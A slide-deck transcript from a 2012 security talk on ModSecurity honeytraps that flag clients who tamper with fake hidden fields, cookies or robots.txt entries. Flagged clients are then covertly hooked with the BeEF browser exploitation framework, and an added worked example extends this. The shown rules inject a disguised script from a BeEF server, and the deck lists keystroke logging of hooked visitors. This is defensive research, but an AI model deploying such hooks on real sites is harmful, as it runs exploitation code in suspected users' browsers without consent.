Building a Web Attacker Dashboard with ModSecurity and BeEF

This talk demonstrates a PoC example of using ModSecurity to set HoneyTraps and hook malicious users with BeEF.

rcbarnett

October 25, 2012

Transcript

  1. © 2012 Presented by: Building a Web Attacker Dashboard with ModSecurity and BeEF
     Ryan Barnett, Lead Security Researcher, Trustwave SpiderLabs
     [email protected] @ryancbarnett
  2. Speaker Info: Ryan Barnett
     • Trustwave SpiderLabs Research
       – Specialize in Web Application Defense/WAF Research
         • WebDefend (Commercial)
         • ModSecurity (Open Source)
     • OWASP
       – Lead the ModSecurity Core Rule Set (CRS) Project
       – Contributor for AppSensor Project
     • Author
       – The Web Application Defender's Cookbook (Wiley, Dec. 2012)
  3. Agenda Breakdown
     • OWASP Web Application Security Risks
     • Situational Awareness
       – Attacks
       – Threats
       – Tracking Threat Agents
     • Building a Web Attacker Dashboard
       – ModSecurity WAF
       – BeEF
       – Audit Console
     • Example Usage
     • Closing
  4. Common Attack Methodology
     • ModSecurity SQL Injection Challenge
     • Automation to identify injection points
       – NetSparker
       – Arachni
       – Sqlmap
       – Havij
     • Manual testing in a web browser to develop working SQLi payloads
       – An iterative process of trial and error
         1. Send initial payloads and observe DB responses
         2. Use obfuscation tactics (comments, encodings, etc.)
         3. Send payload and observe DB response
         4. Repeat steps 2-3
  5. Threat Agent Tracking: BeEF Tagging
     • BeEF – The Browser Exploitation Framework
     • Penetration testing tool that focuses on the web browser
     • Mainly used to demonstrate how internal web clients can become compromised
     • Written in Ruby
     • Lead Developer is Michele Orru (Trustwave SpiderLabs)
       – Exploiting Internal Network Vulns via the Browser using BeEF Bind
       – Thursday October 25, 2012 3:00pm - 3:45pm
       – NTObjectives Room - Texas Ballroom II
     • http://beefproject.com/
  6. Dashboard Components
     • ModSecurity WAF
       – Monitors for attacks
       – Initiates BeEF Hooking
     • BeEF
       – Hooks malicious users
       – Enumerates attacker's location
       – Monitors activities
     • Audit Console
       – Collects audit logs from ModSecurity
       – Shares data with BeEF UI
  7. Update BeEF for Attacker Dashboard Usage
     • Obscure the tell-tale signs of the BeEF hook in the config.yaml file
       – From: hook_file: "/hook.js"
       – To: hook_file: "/img-min.js"
     • Modify the UI text
       – From: "Online Browsers"
       – To: "Online Attackers"
  8. Setting HoneyTraps
     • ModSecurity can modify HTTP response data going to clients
       – SecContentInjection directive
       – SecStreamOutBodyInspection directive
       – @rsub operator
       – STREAM_OUTPUT_BODY variable
       – prepend/append actions
     • Use these capabilities to transparently add HoneyTrap data to applications
  9. HoneyTrap Examples
     • Fake robots.txt Disallow entries
       – Disallow: /scripts.old
     • Fake HTML comments
       – <!-- old file is located at login.bak -->
     • Fake cookies
       – Set-Cookie: user_role=1; expires=Tue, 11-Mar-2014 18:28:03 GMT; path=/; domain=.yoursite.com
     • Fake hidden form field
       – <input type="hidden" name="debug" value="false">
  10. Fake Hidden Form Field Example

      # Phase 4 (response body): splice a fake "admin" field in front of every closing </form> tag.
      # Requires SecContentInjection On and SecStreamOutBodyInspection On (slide 8).
      SecRule STREAM_OUTPUT_BODY \
        "@rsub s/<\/form>/<input type=\"hidden\" name=\"admin\" value=\"false\"><\/form>/id" \
        "id:'999009',phase:4,t:none,nolog,pass"
  11. Fake Parameter Data Sent

      POST /wordpress/wp-login.php HTTP/1.1
      Host: 192.168.168.128
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Proxy-Connection: keep-alive
      Referer: http://192.168.168.128/wordpress/wp-login.php
      Cookie: PHPSESSID=39sg9cjq940h3bo9b0jmce2137; acopendivids=phpbb2,redmine; acgroupswithpersist=nada
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 78

      log=bsmith&pwd=paswword&submit=Login+%C2%BB&redirect_to=wp-admin%2F&admin=true
  12. Initiate BeEF Hooking

      # Phase 2 (request body): the fake field was served as admin=false, so any other value
      # means the client edited it. "block" inherits the disruptive action of SecDefaultAction.
      SecRule ARGS:admin "!@streq false" \
        "id:'999010',phase:2,t:none,log,block,msg:'HoneyTrap Alert: Fake HIDDEN Form Data Manipulated.',setvar:tx.malicious_client=1"

      # Phase 4 (response body): if the flag was set, append the renamed BeEF hook before </html>.
      SecRule TX:MALICIOUS_CLIENT "@eq 1" \
        "chain,id:'999224',phase:4,t:none,pass,log,msg:'Hooking Client with BeEF due to HoneyTrap Violation.'"
        SecRule STREAM_OUTPUT_BODY "@rsub s/<\/html>/<script src=\"http:\/\/192.168.1.109:3000\/img-min.js\"><\/script><\/html>/"
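The following ModSecurity 2.x rule set is an added worked example, not code from the deck or from the ModSecurity or BeEF projects. It puts the four HoneyTrap examples from slide 9 (fake robots.txt entry, fake HTML comment, fake cookie, fake hidden field) beside the detection and hooking pattern from slide 12, and it goes one step beyond the deck by storing the verdict in the persistent IP collection instead of a per-request TX variable, so the hook is injected into every later HTML response the attacker receives, not only the one that tripped the trap. The BeEF address 192.168.1.109:3000 and the renamed hook /img-min.js are taken from the deck's own slides; the rule IDs, the environment variable name honeytrap_cookie and the one-hour flag lifetime are assumptions. The cookie trap uses Apache mod_headers, which must be loaded.

```apache
# Added example (not from the deck). ModSecurity 2.x on Apache with mod_headers loaded.
# Assumed: BeEF at 192.168.1.109:3000 serving the renamed hook /img-min.js (slides 7 and 12);
# rule IDs and the honeytrap_cookie env name are arbitrary choices made for this example.

SecRuleEngine On
SecResponseBodyAccess On            # phase-4 rules never see the body without this
SecContentInjection On              # required for prepend/append
SecStreamOutBodyInspection On       # exposes STREAM_OUTPUT_BODY for @rsub

# Remember each client by source IP so a trap violation outlives the request that tripped it.
# The ip collection is written to disk, so SecDataDir must point at a writable directory.
SecAction "id:'999000',phase:1,t:none,nolog,pass,initcol:ip=%{REMOTE_ADDR}"

# ---------- Set the traps (slide 9) ----------

# Fake robots.txt entry: appended to the real file (assumes the real file ends with a newline).
SecRule REQUEST_FILENAME "@streq /robots.txt" \
  "id:'999001',phase:3,t:none,nolog,pass,append:'Disallow: /scripts.old'"

# Fake HTML comment: spliced in before </head> so the doctype stays first and browsers stay in standards mode.
SecRule STREAM_OUTPUT_BODY "@rsub s/<\/head>/<!-- old file is located at login.bak --><\/head>/i" \
  "id:'999002',phase:4,t:none,nolog,pass"

# Fake cookie: issued once, via mod_headers, when the client does not already present it.
SecRule &REQUEST_COOKIES:user_role "@eq 0" \
  "id:'999003',phase:1,t:none,nolog,pass,setenv:honeytrap_cookie=1"
Header add Set-Cookie "user_role=1; path=/" env=honeytrap_cookie

# Fake hidden form field (the slide 10 technique), added before every closing </form>.
SecRule STREAM_OUTPUT_BODY "@rsub s/<\/form>/<input type=\"hidden\" name=\"debug\" value=\"false\"><\/form>/i" \
  "id:'999004',phase:4,t:none,nolog,pass"

# ---------- Spring the traps ----------

# These paths exist nowhere except in the fake robots.txt entry and the fake HTML comment.
SecRule REQUEST_FILENAME "@rx ^/(scripts\.old|login\.bak)$" \
  "id:'999101',phase:1,t:none,log,block,msg:'HoneyTrap Alert: Fake robots.txt/HTML comment resource requested.',\
  setvar:ip.malicious_client=1,expirevar:ip.malicious_client=3600"

# The fake cookie was issued as user_role=1; any other value means it was tampered with.
SecRule REQUEST_COOKIES:user_role "!@streq 1" \
  "id:'999102',phase:1,t:none,log,block,msg:'HoneyTrap Alert: Fake Cookie Manipulated.',\
  setvar:ip.malicious_client=1,expirevar:ip.malicious_client=3600"

# The fake hidden field was served as debug=false; any other value means it was tampered with.
SecRule ARGS:debug "!@streq false" \
  "id:'999103',phase:2,t:none,log,block,msg:'HoneyTrap Alert: Fake HIDDEN Form Data Manipulated.',\
  setvar:ip.malicious_client=1,expirevar:ip.malicious_client=3600"

# ---------- Hook (slide 12 pattern, keyed on the persistent IP flag) ----------

# Only HTML responses get the script tag; injecting it into JSON, images or downloads just corrupts them.
SecRule IP:MALICIOUS_CLIENT "@eq 1" \
  "chain,id:'999201',phase:4,t:none,log,pass,msg:'Hooking Client with BeEF due to HoneyTrap Violation.'"
  SecRule RESPONSE_CONTENT_TYPE "@beginsWith text/html" "chain,t:none"
    SecRule STREAM_OUTPUT_BODY "@rsub s/<\/html>/<script src=\"http:\/\/192.168.1.109:3000\/img-min.js\"><\/script><\/html>/i"
```

Two operational points are worth checking before relying on this. First, `block` takes whatever disruptive action SecDefaultAction specifies for that phase: with `deny`, the request that sprang the trap is answered with the error document and the hook lands in the attacker's next HTML response, which is exactly why the flag lives in the IP collection rather than in TX; with `pass`, the violating response itself is hooked, as on slide 12. Second, SecResponseBodyMimeType must include text/html and SecResponseBodyLimit must be large enough for the pages being modified, otherwise the phase-4 rules are silently skipped and no trap or hook is ever injected.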
  13. Caution
     • BeEF is extremely powerful
     • The use of many of its modules may violate hacking laws
     • Consult your legal department before use
  14. Focusing on Monitoring Capabilities
     • Web Fraud Detection vendors do this today
       – Inject code for client device fingerprinting
       – Inspecting the browser/system for malicious code
     • We are focusing on enumerating information about the attacker
       – Geo Location
       – Network information
       – Keystroke logging
  15. ModSecurity Audit Console Integration
     • Beef_dir/extensions/modsecurity/config.yaml

       beef:
           extension:
               modsecurity:
                   enable: true
                   name: 'ModSecurity'
                   authors: ["antisnatchor"]
                   auditconsole:
                       ip: "console.yoursite.com"
                       port: "443"
                       ssl: true
                       user: "defender"
                       passwd: "secretpassword"
  16. Closing
     • Feedback/Questions?
     • Email
       – [email protected]
       – [email protected]
     • Twitter
       – @ryancbarnett
       – @ModSecurity
     • OWASP Open Source Showcase - ModSecurity
       – Friday October 26, 2012 2:00pm - 5:00pm
       – Foothills I (17th Floor)